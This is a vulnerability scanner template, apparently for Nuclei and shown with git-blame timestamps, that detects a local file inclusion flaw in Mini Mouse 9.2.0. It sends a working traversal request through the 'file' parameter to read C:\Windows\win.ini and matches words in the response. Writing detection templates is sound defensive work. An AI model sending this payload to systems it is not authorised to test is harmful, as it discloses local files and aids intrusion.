2021-09-06 08:56:20 +00:00
id : minimouse-lfi
info :
2022-07-27 20:17:31 +00:00
name : Mini Mouse 9.2.0 - Local File Inclusion
2021-09-06 08:56:20 +00:00
author : 0x_Akoko
severity : high
2022-07-27 20:17:31 +00:00
description : Mini Mouse 9.2.0 is vulnerable to local file inclusion because it allows remote unauthenticated attackers to include and disclose the content of locally stored files via the 'file' parameter.
2022-04-22 10:38:41 +00:00
reference :
- https://www.exploit-db.com/exploits/49744
2022-07-27 20:17:31 +00:00
classification :
cvss-metrics : CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score : 7.5
cwe-id : CWE-22
2022-08-27 04:41:18 +00:00
tags : lfi,edb,minimouse
2021-09-06 08:56:20 +00:00
requests :
- method : GET
path :
- "{{BaseURL}}/file=C:%5CWindows%5Cwin.ini"
matchers-condition : and
matchers :
- type : status
status :
- 200
2021-09-06 09:14:39 +00:00
2021-09-06 08:56:20 +00:00
- type : word
words :
- "bit app support"
- "fonts"
- "extensions"
condition : and
part : body
2022-07-27 20:17:31 +00:00
# Enhanced by mp on 2022/07/27